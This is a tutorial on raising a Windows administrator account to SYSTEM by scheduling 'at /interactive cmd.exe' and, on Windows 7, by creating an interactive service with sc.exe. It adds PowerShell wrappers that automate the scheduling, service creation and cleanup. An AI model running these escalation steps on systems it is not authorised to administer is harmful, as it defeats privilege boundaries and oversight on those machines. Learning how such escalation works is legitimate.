Raising user privileges with the AT command

This project outlines one way that a user may be able to raise their privileges on a Windows-based system. The ability to use the AT command is the security risk here. AT hands jobs to the Task Scheduler service, which runs as the built-in SYSTEM (LocalSystem) account, so anything AT launches inherits that account. By default only members of the local Administrators group can use AT at all (everyone else is refused), so in practice this is an Administrator-to-SYSTEM escalation rather than one an ordinary user can perform; whether it applies depends on what privileges the account already has.

Let's first look at how we can tell whether the user has privileges to run the AT command. If they cannot run the AT command, they cannot raise their privileges in this way.

>First log in to the user account
>Now go to Start >> Run
>When the run window opens type in the following:

cmd

>This opens the command prompt. Now type in the following:

at

>If it gives the error message "Access is denied."
then the user cannot run the command. If the message is "There are no entries in the list." (or a list of already scheduled jobs), then the user can use this process to gain elevated privileges. If you don't understand what privileges are, do some research on it; basically it means the account can do more administrative things than it was allowed to before this process, and here the result is the SYSTEM account, which outranks even an administrator.

**If you would like to learn more about the AT command, then in the command prompt type the following:

at /?

This will tell you more about its use.

Now that you know which accounts can and cannot perform this process, let's take a look at how it's done.
The AT command is used to schedule tasks on your computer just like the Task Scheduler in the Control Panel; from the command line, however, we have more control than the Windows GUI gives us, so let's schedule a task.

>First log in to the user account for which you want to perform this action.

>Go to Start >> Run

>type:

cmd

>This opens the command prompt again.

>OK, now type in the following command:

at 14:03 /interactive "cmd.exe"

***Replace 14:03 with the current time plus one minute; this makes the job run one minute from now. Or, if you want, give yourself a couple of minutes. Use 24-hour (military) time; if you don't understand that, look it up, because that is not the topic here.**

> If the minute changes before you hit Enter, the time you typed is already in the past and AT will not run the job until tomorrow, so if you want to be safe schedule it two minutes after the current time.

>It should give you the message
"Added a new job with job ID = (some #)"

>This tells us it worked; now just wait until the time you entered. (If you change your mind before then, at (job ID) /delete removes the job.)

>At the time you entered, a new command prompt window will open. LEAVE BOTH WINDOWS OPEN.

>In the new window, look at the title bar at the top; it should say
C:\Windows\System32\svchost.exe
>Now take a look at the other command prompt window, the one we opened before; its title bar says
C:\Windows\System32\cmd.exe

>Now we see a difference, but what is the difference?
Well, the cmd.exe window is a normal command prompt. The svchost window is also a command prompt, but it was spawned by the Task Scheduler service (which lives inside svchost.exe), and it is running as the SYSTEM account, not as a user account! Where the whoami tool is available (Windows 7 and later, or the Windows XP Support Tools), typing whoami in the new window prints nt authority\system, which confirms it.

>So what can we do with this? Well, we already have raised privileges at this point, but unless you are familiar with the command prompt (which everyone should be, in my opinion) you can't do much. To take care of that we do a little trick: close the Windows GUI and re-open it from the SYSTEM shell, so that the new desktop runs as SYSTEM too. Go back to your svchost.exe window, BUT DON'T CLOSE THE OTHER ONE, WE STILL NEED IT.

>type in the following:

taskkill /f /im explorer.exe

>What this does is close explorer.exe, which is Windows Explorer, the GUI (desktop, taskbar and Start menu) for Windows.

>Now type:

start %SystemRoot%\explorer.exe

>This will re-open Explorer, and because it was started from the SYSTEM shell, the new Explorer process runs as SYSTEM.

>Since Explorer is now running under the "SYSTEM" account, whose profile has probably never been used for a desktop before, you will be greeted with the Windows tour and possibly some other first-run messages.

>Click on Start and look at the top of the menu where it normally shows your name. It now says "SYSTEM", which confirms that the desktop is running as the system account itself.

>Now you can do whatever you want from here just as you normally would, but you will be able to adjust more settings, because everything you launch from this desktop runs as SYSTEM.

Good deal, but how do I get back?

Well, to get back, go to your open svchost window

and type:

taskkill /f /im explorer.exe

Now go to the cmd.exe window (the one running as your own account)

and type in (yup, you guessed it):

start %SystemRoot%\explorer.exe
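The procedure above, wrapped as an added PowerShell example. This is not code from the original page; the function names are my own. It assumes Windows XP/2003-era at.exe, where /interactive still opens the window on the logged-on desktop (on Vista and later the job runs in session 0 and nothing appears, which is why the Windows 7 section below exists), and that PowerShell is installed, which on those systems was an optional download. Computing the start time instead of typing it avoids the minute-rollover problem described above.

```powershell
# Added example, not code from the original page: a PowerShell wrapper around the
# at.exe procedure above. Function names are my own. Assumes XP/2003-era at.exe,
# where /interactive still reaches the logged-on desktop; on Vista and later the
# job lands in session 0 and no window is shown to the user.

function Test-AtAccess {
    # The access check from the tutorial: a refused account sees "Access is denied."
    $output = (& at.exe 2>&1) | Out-String
    return ($output -notmatch 'Access is denied')
}

function Get-AtTime {
    param([int]$MinutesAhead = 2)
    # at.exe wants 24-hour HH:mm. Two minutes ahead avoids the rollover the tutorial
    # warns about: a time that is already past runs tomorrow instead of today.
    return (Get-Date).AddMinutes($MinutesAhead).ToString('HH:mm')
}

function Start-SystemShellViaAt {
    param([int]$MinutesAhead = 2)
    if (-not (Test-AtAccess)) {
        throw 'This account cannot use at.exe, so the technique does not apply to it.'
    }
    $when  = Get-AtTime -MinutesAhead $MinutesAhead
    $reply = (& at.exe $when /interactive 'cmd.exe' 2>&1) | Out-String
    # Expected reply: "Added a new job with job ID = N"
    if ($reply -match 'job ID = (\d+)') {
        return [pscustomobject]@{ Time = $when; JobId = [int]$Matches[1] }
    }
    throw "at.exe did not accept the job: $reply"
}

function Restart-Explorer {
    # The desktop swap from the tutorial. Run from the SYSTEM shell to get a SYSTEM
    # desktop; run from your ordinary cmd.exe window to get your own desktop back.
    Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue
    Start-Process -FilePath "$env:SystemRoot\explorer.exe"
}

# Usage:
#   $job = Start-SystemShellViaAt
#   "Job $($job.JobId) fires at $($job.Time); watch for the svchost.exe-titled window."
#   In that window, where whoami exists (Windows 7+, or the XP Support Tools),
#   whoami prints nt authority\system.
#   Changed your mind before it fires?   at.exe $job.JobId /delete
```

Test-AtAccess is the same check the tutorial makes by hand: if at.exe answers "Access is denied." the account is not in the group the Task Scheduler service trusts, and nothing further in this page applies to it.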

FOR WINDOWS 7

On Windows Vista and later, services run in the isolated session 0, so an AT /interactive job no longer shows a window on your desktop. An interactive service gets you the SYSTEM shell instead. Note that creating a service requires an elevated (administrator) prompt, so this too is an Administrator-to-SYSTEM step.

Navigate to the C:\Windows\System32 folder,

right-click cmd.exe, choose Run as administrator, and then type in the following command lines:

sc create testsvc binpath= "cmd /K start" type= own type= interact

sc start testsvc

You will get a popup window from "Interactive Services Detection". Click "View the message"; Windows switches you to the session 0 desktop, where a cmd prompt running as SYSTEM is waiting. When you are done, switch back to your own desktop and remove the test service you created, since it stays registered otherwise.
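The Windows 7 variant above as an added PowerShell example, with the cleanup the page does not show. This is not code from the original page; the function names are my own, while the service name testsvc and the sc.exe arguments are the page's. It must run from an elevated PowerShell, because sc.exe refuses to create a service otherwise.

```powershell
# Added example, not code from the original page: the Windows 7 interactive-service
# variant, plus cleanup. Function names are my own; 'testsvc' and the sc.exe
# arguments come from the page. Run from an elevated PowerShell (sc.exe create
# needs administrator rights; 'sc' alone is a PowerShell alias for Set-Content,
# hence sc.exe).

function New-InteractiveSystemShell {
    param([string]$ServiceName = 'testsvc')
    # sc.exe syntax requires the space after each '='; type= interact needs type= own.
    $create = (& sc.exe create $ServiceName binpath= 'cmd /K start' type= own type= interact 2>&1) | Out-String
    if ($create -notmatch 'SUCCESS') { throw "sc create failed: $create" }
    # Starting the service launches cmd.exe as LocalSystem in session 0. cmd.exe never
    # reports itself to the Service Control Manager as started, so sc.exe start usually
    # ends with a timeout error; the shell exists regardless. Interactive Services
    # Detection then offers "View the message" to switch to the session 0 desktop.
    & sc.exe start $ServiceName 2>&1 | Out-Null
}

function Remove-InteractiveSystemShell {
    param([string]$ServiceName = 'testsvc')
    # Close the session 0 cmd window first, then remove the service registration.
    & sc.exe stop $ServiceName 2>&1 | Out-Null
    $delete = (& sc.exe delete $ServiceName 2>&1) | Out-String
    return ($delete -match 'SUCCESS')
}

# Usage (elevated):
#   New-InteractiveSystemShell      # then click "View the message"; whoami -> nt authority\system
#   Remove-InteractiveSystemShell   # returns $true once the service entry is gone
```

Remove-InteractiveSystemShell returns the result of sc.exe delete so a script can confirm that the test service did not outlive the exercise; a leftover service that starts cmd.exe as SYSTEM is exactly the kind of thing an auditor would flag.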

Now you are back to where you were. Have fun and happy hacking!